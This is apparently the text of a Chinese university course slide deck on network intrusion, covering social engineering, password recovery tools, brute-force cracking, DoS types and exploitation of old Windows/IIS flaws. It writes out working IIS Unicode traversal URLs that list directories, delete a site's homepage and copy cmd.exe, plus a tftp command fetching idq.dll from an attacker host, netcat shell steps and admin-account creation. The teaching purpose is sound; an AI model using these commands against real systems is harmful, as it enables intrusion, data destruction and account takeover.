第五章 网络入侵.ppt

上传人:hyn****60 文档编号:70745866 上传时间:2023-01-27 格式:PPT 页数:79 大小:2.29MB
返回 下载 相关 举报
第五章 网络入侵.ppt_第1页
第1页 / 共79页
第五章 网络入侵.ppt_第2页
第2页 / 共79页
点击查看更多>>
资源描述

《第五章 网络入侵.ppt》由会员分享,可在线阅读,更多相关《第五章 网络入侵.ppt(79页珍藏版)》请在得力文库 - 分享文档赚钱的网站上搜索。

1、第五章 网络入侵 内容提要n本章是攻击技术中最重要的一章,介绍目前常用的网络攻击手段:n社会工程学攻击n物理攻击n暴力攻击n利用Unicode漏洞攻击n利用缓冲区溢出漏洞进行攻击等技术。n并结合实际,介绍流行的攻击工具的使用以及部分工具的代码实现。5.1 社会工程学攻击 n社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。n举个例子:一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和

2、他们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。社会工程学攻击n目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造Emailn1、打电话请求密码 n尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。n2、伪造Emailn使用telnet,一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息

3、显得是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。5.2 物理攻击与防范 n物理安全是保护一些比较重要的设备不被接触。n物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。5.2.1获取管理员密码案例5-1 得到管理员密码n用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,可以利用程序将当前登录用户的密码解码出来,如图5-1所示。案例5-1得到管理员密码n使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘

4、根目录,执行该程序,将得到当前用户得登录名,如图5-2所示。获取管理员密码FindPassn如果有多人登录同一台计算机,还可以查看其他用户的密码,语法如下:nFindPass.exe 计算机名 用户名 PID of winlogonn前两项参数容易知道,winlogon的进程号可以到任务管理器中查到,也可以利用pulist.exe查看。5.2.2 权限提升n有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。n其实不然,用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。案例5-2 普通用户建立管理员帐号n利用Ha

5、cker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如图5-5所示。普通用户建立管理员帐号n输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如图5-6所示。5.3 暴力攻击n暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码。n一个黑客需要破解段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这

6、种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。5.3 暴力攻击n字典攻击是最常见的一种暴力攻击。z它通过使用某种具体的密码来缩小尝试的范围,大多数用户使用标准单词作为一个密码。n一个字典攻击试图通过利用包含单词列表的文件去破解密码。5.3.1字典文件 n一次一次字典攻击能否成功,很大因素上决定于字典文件。字典攻击能否成功,很大因素上决定于字典文件。一个好的字典文一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典

7、文件的机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。可以大大的提高破解效率。n一个一个字典文件字典文件本身就是一个标准的本身就是一个标准的文本文件文本文件,其中的每一行就代表一个,其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件,图可能的密码。目前有很多工具软件专门来创建字典文件,图5-8是一个简是一个简单的字典文件。单的字典文件。5.3.2 暴力破解操作系统密码 n字典文件为暴力破解提供了一条捷径,程序首先通

8、过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示n案例5-3 暴力破解操作系统密码 n比如使用图5-8所示的字典文件,利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来,如图5-9所示。n邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。n尤其七位全部是数字,更容易被破解。n案例5-4 电子邮箱暴力破解 n破解电子邮箱密码,一个比较著名的工具软件是:黑雨POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界面如图5-10所示。5.3.3 暴力破解邮箱密码5.3.4暴力破解软件密码 n目前许多软件都具有加密的功能,

9、比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话,同样容易被破解。n案例5-5 Office文档暴力破解 修改权限密码n在对话框中选择选项卡“安全性”,在打开权限密码和修改权限密码的两个文本框中都输入“999”,如图5-12所示。输入密码n保存并关闭该文档,然后再打开,就需要输入密码了,如图5-13所示。破解Word文档密码n该密码是三位的,使用工具软件,Advanced Office XP Password Recovery可以快速破解Word文档密码,主界面如图5-14所示。破解Word文档密码n点击工

10、具栏按钮“Open File”,打开刚才建立的Word文档,程序打开成功后会在Log Window中显示成功打开的消息,如图5-15所示。破解Word文档密码n设置密码长度最短是一位,最长是三位,点击工具栏开始的图标,开始破解密码,大约两秒钟后,密码被破解了,如图5-16所示。5.4 Unicode漏洞专题 n通过通过打操作系统的补丁程序打操作系统的补丁程序,就可以,就可以消除漏洞消除漏洞。只要。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。了相关的补丁。nUnicode漏洞是漏洞是2000-10-17发布的,受影响的版本:发布的

11、,受影响的版本:nMicrosoft IIS 5.0+Microsoft Windows 2000系列版本系列版本nMicrosoft IIS 4.0+Microsoft Windows NT 4.0n消除该漏洞的方式是安装操作系统的补丁,只要安装消除该漏洞的方式是安装操作系统的补丁,只要安装了了SP1以后,该漏洞就不存在了。微软以后,该漏洞就不存在了。微软IIS 4.0和和5.0都存在利用扩展都存在利用扩展UNICODE字符取代字符取代/和和而能利而能利用用./目录遍历的漏洞。目录遍历的漏洞。5.4.1Unicode漏洞的检测方法n使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍

12、的X-Scan来对目标系统进行扫描,目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置如图5-17所示。Unicode漏洞的检测方法n将主机添加到目标地址,扫描结果如图5-18所示。Unicode漏洞的检测方法n可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:n /scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dirn其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。U

13、nicode漏洞的检测方法nscripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。Unicode漏洞的检测方法n在Windows的目录结构中,可以使用两个点和一个斜线“./”来访问上一级目录,在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。n浏览器地址栏中禁用符号“./”,但是可以使用符号“/”的Unicode的编码。比如“/scripts/.%c0%2f.

14、/winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞n此漏洞从中文此漏洞从中文IIS4.0+SP6开始,还影响中文开始,还影响中文WIN2000+IIS5.0、中文、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。在,台湾繁体中文也同样存在这样的漏洞。在NT4中中/编码为编码为“%c1%9c”或者或者“%c1%9c”,WIN2000英文版是英文版是“%c0%af”。n但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,但从国外某些站

15、点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。该编码存在于日文版、韩文版等操作系统。n%c1%pcn%c0%9vn%c0%qfn%c1%8sn%e0%80%afn利用该漏洞读取出计算机上目录列表,比如读取利用该漏洞读取出计算机上目录列表,比如读取C盘的目录盘的目录,只要在浏览器中输,只要在浏览器中输入入n“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”利用Unicode漏洞读取系统盘目录 利用Unicode漏洞读取系统盘目录n利用语句得到对方计算机上装了

16、几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inin执行的结果如图5-22所示。5.4.2 利用Unicode漏洞删除主页n利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。n使用的语句是:nhttp

17、:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp利用Unicode漏洞删除主页拷贝文件n为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:nhttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exen程序执行结果如图5-24所示。查看C盘的目录n以后使用cmd.exe命令就方便了

18、,比如查看C盘的目录,使用的语句就可以简化为:nhttp:/172.18.25.109/scripts/c.exe?/c+dir+c:n执行的结果如图5-25所示。案例5-7 利用Unicode漏洞入侵系统 n在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。n需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通文件传输协议TFTP(Text File Tra

19、nsmission Protocol)一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图5-26所示。利用Unicode漏洞入侵系统利用Unicode漏洞入侵系统n这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。在浏览器中执行命令:n“http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”

20、,n命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件,执行成功的界面如图5-27所示。上载文件 查看scripts目录 n上传完毕后可以查看一下scripts目录,是否真的上传成功了。如图5-28所示。入侵对方主机 n说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。n拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:n“ispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直

21、接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程5-29所示。建立用户 n可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,也可以利用net命令将该用户添加到管理员组。如图5-30所示。5.5 其他漏洞攻击 n5.5.1利用打印漏洞n利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。经过测试,该漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。n使用工具软件:cniis.exe,使用的语法格式是:“cniis 172.18.25.109 0”,第一个参数是目标

22、的IP地址,第二参数是目标操作系统的补丁号,因为172.18.25.109没有打补丁,这里就是0。拷贝cniis.exe文件到C盘根目录,执行程序如图5-31所示。5.5.2 SMB致命攻击nSMB(Session Message Block,会话消息块协议,会话消息块协议)又叫做)又叫做NetBIOS或或LanManager协议,用于不同计算机之间协议,用于不同计算机之间文件、打印机、串口和通讯文件、打印机、串口和通讯的共享的共享和用于和用于Windows平台上提供磁盘和打印机的共享。平台上提供磁盘和打印机的共享。nSMB协议版本有很多种,在协议版本有很多种,在Windows 98、Wind

23、ows NT、Windows 2000和和XP使用的是使用的是NTLM 0.12版本。版本。n利用该协议可以进行各方面的攻击利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计,比如可以抓取其他用户访问自己计算机共享目录的算机共享目录的SMB会话包,然后利用会话包,然后利用SMB会话包登录对方的计算机。会话包登录对方的计算机。下面介绍利用下面介绍利用SMB协议让对方操作系统系统协议让对方操作系统系统重新启动或者蓝屏重新启动或者蓝屏。案例5-9 致命攻击 n使用的工具软件是:SMBDie V1.0,该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁,软件的主界面如图5-

24、32所示。致命攻击n攻击的时候,需要两个参数:对方的IP地址和对方的机器名,窗口中分别输入这两项,如图5-33所示。致命攻击 n然后再点按钮“Kill”,如果参数输入没有错误的话,对方计算机立刻重启或蓝屏,命中率几乎100%,被攻击的计算机蓝屏界面如图5-34所示。5.6 缓冲区溢出攻击n目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果使在系统上产生一个后门。n这项攻击对技术要求比较高,但是攻击的过程却非常简单。

25、缓冲区溢出原理很简单,比如程序:缓冲区溢出攻击nvoid function(char*szPara1)nnchar buffer16;nstrcpy(buffer,szPara1);nn程序中利用strcpy函数将szPara1中的内容拷贝到buff中,只要szPara1的长度大于16,就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有:strcat()、gets()、scanf()等。5.6.1 RPC漏洞溢出 n远程过程调用RPC(Remote Procedure Call),是操作系统的一种消息传递功能,允许应用程序呼叫网络上的计算机。当系统启动的时候,自动加载RPC服务。

26、可以在服务列表中看到系统的RPC服务,如图5-35所示。案例5-10 利用RPC漏洞建立超级用户 nRPC溢出漏洞,对SP4也适用,必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞,该工具是ISS安全公司2003年7月30日发布的,运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞(823980-MS03-026)”补丁程序。n如果没有安装补丁程序,该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录,现在要检查地址段172.18.25.109到172.18.25.110的主机,执行命令“scanms.exe 172.18

27、.25.109-172.18.25.110”,检查过程如图5-36所示。检查缓冲区溢出漏洞检查缓冲区溢出漏洞n利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。n新建用户的用户名和密码都是qing10,这样就可以登录对方计算机了,RPC服务停止操作系统将有许多功能不能使用,非常容易被管理员发现,使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全过程如图5-37所示。攻击的全过程 5.6.2 利用IIS溢出进行攻击 n案例5-11 利用IIS溢出入侵系统n利用软件Snake

28、IIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口,工具软件的主界面如图5-38所示。利用IIS溢出进行攻击n该软件适用于各种类型的操作系统,比如对172.18.25.109进行攻击,172.18.25.109的操作系统的Windows 2000,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dir c:”设置如图5-39所示。n点击按钮“IDQ溢出”,出现攻击成功的提示框,如图5-40所示。n这个时候,813端口已经开放,利用工具软件nc.exe连接到该端口,将会自动执行刚才发送的DOS命令“dir c:”,使用的语法是:nc.e

29、xe-vv 172.18.25.109 813,其中-vv是程序的参数,813是目标端口。可以看到命令的执行结果,如图5-41所示。监听本地端口 n下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc-l-p 813”,执行的过程如图5-42所示。n这个窗口就这样一直保留,启动工具软件snake,本地的IP地址是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出选项中的第一项,设置IP为本地IP地址,端口是813,如图5-43所示。n设置好以后,点击按钮“IDQ溢出”,程序

30、显示对话框如图4-44所示。n查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来,如图4-45所示。5.6.3利用WebDav远程溢出n需要使用工具软件nc.exe和webdavx3.exe,首先在DOS命令行下执行webdavx3.exe,如果执行的话,该程序将提示已经过期了,如图4-46所示。攻击n修改本地系统时间到2001年,这样就可以攻击了,在命令后面直接跟对方的IP地址就可以了,现在要攻击的计算机是172.18.25.109,执行情况如图4-47所示。入侵对方的计算机n该程序不能自动退出,当发现程序长时间没有反映的时候,需要手工按下“CTR

31、L+C”退出程序。该程序在对方的计算机上开了一个端口7788,依然可以nc.exe程序入侵对方的计算机,过程如图4-48所示。5.7 拒绝服务攻击 n拒绝服务攻击的简称是:DoS(Denial of Service)攻击,凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击,其目的是使目标计算机或网络无法提供正常的服务。n最常见的DoS攻击是:计算机网络带宽攻击和连通性攻击。带宽攻击是以极大的通信量冲击网络,使网络所有可用的带宽都被消耗掉,最后导致合法用户的请求无法通过。连通性攻击指用大量的连接请求冲击计算机,最终导致计算机无法再处理合法用户的请求。2.4 拒绝服务攻击拒绝服务攻击(补充)补充

32、)n拒绝服务攻击的主要目的是使被攻击的网络或服务器不能提供正常的服务。有很多方式可以实现这种攻击,最简单的方法是切断网络电缆或摧毁服务器;当然利用网络协议的漏洞或应用程序的漏洞也可以达到同样的效果。(可使用PingPing命令命令)n DoS攻击的原理:利用合理的服务请求来占用过多的服务资源,致使服务超载,无法响应其他的请求。这些服务资源包括网络带宽,文件系统空间容量,开放的进程或者向内的连接。这种攻击会导致资源的匮乏,无论计算机的处理速度多么快,内存容量多么大,互连网的速度多么快都无法避免这种攻击带来的后果。因为任何事都有一个极限,所以,总能找到一个方法使请求的值大于该极限值,因此就会使所提

33、供的服务资源匮乏,象是无法满足需求。2.4.1 拒绝服务攻击的手段拒绝服务攻击的手段1.SYN湮没(创建大量的(创建大量的“半连接半连接”来进行攻击)来进行攻击)nSYN是TCP/IP协议建立连接时使用的握手信号。在客户机和服务器之间建立正常的TCP网络连接时,客户机首先发出一个SYN消息,服务器使用SYN-ACK应答表示接收到了这个消息,最后客户机以再ACK消息响应。这样在客户机和服务器之间才能建立起可靠的TCP连接,数据才可以在客户机和服务器之间传递。nSYN湮没攻击的原理:向一台服务器发送许多SYN消息,该消息中携带的源地址根本不可用,但是服务器会当真的SYN请求处理,当服务器尝试为每个

34、请求消息分配连接来应答这些SYN请求时,服务器就没有其它资源来处理来真正用户的合法SYN请求了。这就造成了服务器不能正常的提供服务。2.Land攻击 nLand攻击和其它拒绝服务攻击相似,也是通过利用某些操作系统在TCP/IP协议实现方式上的漏洞来破坏主机。在Land攻击中,一个精心制造的SYN数据包中的源地址和目标地址都被设置成某一个服务器地址,这将导致接收到这个数据包的服务器向它自己发送SYN-ACK消息,结果又返回ACK消息并创建一个空连接每个这样的连接都将一直保持到超时。n不同的操作系统对Land攻击反应不同,多数UNIX操作系统将崩溃,而Windows NT会变的极其缓慢(大约持续五

35、分钟)。n对付Land攻击可以通过对系统升级或装上补丁程序,以及修改防火墙的规则。3.Smurf攻击 nSmurf攻击是以最初发动这种攻击的程序名Smurf来命名。这种攻击方法结合使用了IP欺骗和ICMP回复方法使大量数据充斥目标系统,引起目标系统不能为正常系统进行服务。n简单的Smurf攻击:将ICMP应答请求(ping)数据包的目的地址设置成受害网络的广播地址,最终导致该网络的所有主机都对此ICMP应答请求作出答复,从而导致网络阻塞。因此它比ping of death攻击的流量高出一到两个数量级。复杂的Smurf攻击将源地址改为第三方的受害者,最终导致第三方崩溃。4.Teardrop攻击(

36、利用包的利用包的“分段分段重组重组”技术)技术)nTeardrop是一种拒绝服务攻击,可以令目标主机崩溃或挂起。目前多数操作系统已经升级或有了补丁程序来避免受到这种攻击。nTeardrop攻击和其他类似的攻击发出的TCP或UDP包包含了错误的IP重组信息,这样主机就会使用错误的信息来重新组合成一个完整的包。结果造成崩溃、挂起或者执行速度极其缓慢。5.Ping of Death攻击(故意创建包长度大于(故意创建包长度大于65535B的包)的包)nPing of Death攻击是利用网络操作系统(包括UNIX的许多变种、windows 和MacOS等)的缺陷,当主机接收到一个大的不合法的ICMP回

37、应请求包(大于64KB)时,会引起主机挂起或崩溃。n防范:可以将防火墙配置成丢弃所有传入的ICMP请求,但不包括传入的ICMP响应或回应。即网络之外无法Ping内部机器,但网络内部可以进行Ping请求。2.5 分布式拒绝服务攻击(DDoS)nDDoS是在DoS的基础之上产生的。单一的DoS一般采用一对一方式;DDoS利用更多的傀儡机发起攻击,以比从前更大的规模来进攻受害者。n攻击运行原理:整个攻击体系分为4部分,其中控制傀儡机只发命令而不参与实际的攻击。对第2和第3部分的计算机,黑客有控制权,并能把相应的DDoS程序上传到这些平台上,这些程序与正常程序一样运行并等待来自网络入侵者的指令。2.5

38、 分布式拒绝服务攻击(续)案例5-13 程序分析n案例5-13 程序分析n利用缓冲区或者漏洞的攻击的程序一般都比较小,但是都要涉及shell编程技术和Socket编程技术。n案例5-8使用cniis.exe工具进行攻击,该工具的源代码如程序proj5_13.cpp所示。本章总结n本章主要介绍网络攻击的常用手段和技巧n介绍的工具都是有代表性的工具,但是还有许多其他的工具可以进行有效的攻击。n需要了解社会工程学攻击的基本方法、学会防范物理攻击。n重点掌握暴力攻击下的暴力破解操作系统密码、暴力破解邮箱密码和暴力破解Office文档的密码;n掌握各种漏洞攻击以及防御手段,掌握各种缓冲区溢出攻击的手段以

39、及防御的手段。n了解拒绝服务攻击的概念。本章习题n一、选择题n1.打电话请求密码属于_攻击方式。nA.木马 B.社会工程学nC.电话系统漏洞 D.拒绝服务n2.一次字典攻击能否成功,很大因素上决定于_。nA.字典文件B.计算机速度nC.网络速度D.黑客学历n3.SYN风暴属于_攻击。nA.拒绝服务攻击B.缓冲区溢出攻击nC.操作系统漏洞攻击D.社会工程学攻击n4.下面不属于DoS攻击的是_nA.Smurf攻击B.Ping of DeathnC.Land攻击D.TFN攻击本章习题n二、填空题n1.字典攻击是最常见的一种_攻击。n2._的特点是先使用一些典型的黑客入侵手段控制一些高带宽的服务器,然

40、后在这些服务器上安装攻击进程,集数十台,数百台甚至上千台机器的力量对单一攻击目标实施攻击。n3.SYN flooding攻击即是利用的_设计弱点。本章习题n三、简答题与程序设计题n1.简述社会工程学攻击的原理。n2.登录系统以后如何得到管理员密码?如何利用普通用户建立管理员账户?n3.简述暴力攻击的原理。暴力攻击如何破解操作系统的用户密码、如何破解邮箱密码、如何破解Word文档的密码?针对暴力攻击应如何防御?n4.简述Unicode漏洞的基本原理。n5.简述缓冲区溢出攻击的原理。n6.简述拒绝服务的种类与原理。n7.利用Unicode漏洞入侵对方计算机,更改Administrator密码为123456。(上机完成)n8.利用三种不同的方法,入侵对方系统,并撰写入侵总结报告。(上机完成)n9.简述DDos的特点以及常用的攻击手段,如何防范?

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 生活休闲 > 生活常识

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知得利文库网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号-8 |  经营许可证:黑B2-20190332号 |   黑公网安备:91230400333293403D

© 2020-2023 www.deliwenku.com 得利文库. All Rights Reserved 黑龙江转换宝科技有限公司 

黑龙江省互联网违法和不良信息举报
举报电话:0468-3380021 邮箱:hgswwxb@163.com